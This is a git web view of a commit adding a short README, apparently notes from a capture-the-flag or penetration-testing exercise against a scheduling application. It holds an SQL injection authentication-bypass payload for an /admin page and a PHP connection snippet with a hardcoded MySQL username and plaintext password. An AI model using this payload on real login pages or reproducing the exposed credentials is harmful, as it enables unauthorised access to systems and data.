aboutsummaryrefslogtreecommitdiff
path: root/faculty/README.md
diff options
context:
space:
mode:
Diffstat (limited to 'faculty/README.md')
-rw-r--r--faculty/README.md14
1 files changed, 14 insertions, 0 deletions
diff --git a/faculty/README.md b/faculty/README.md
new file mode 100644
index 0000000..7b505de
--- /dev/null
+++ b/faculty/README.md
@@ -0,0 +1,14 @@
+> injection on /admin
+```
+' OR 1=1 #
+```
+
+> mysql
+```php
+<?php
+$conn = new mysqli('localhost','sched','Co.met06aci.dly53ro.per','scheduling_db')
+
+or
+die("Could not connect to mysql".mysqli_error($con));
+```
+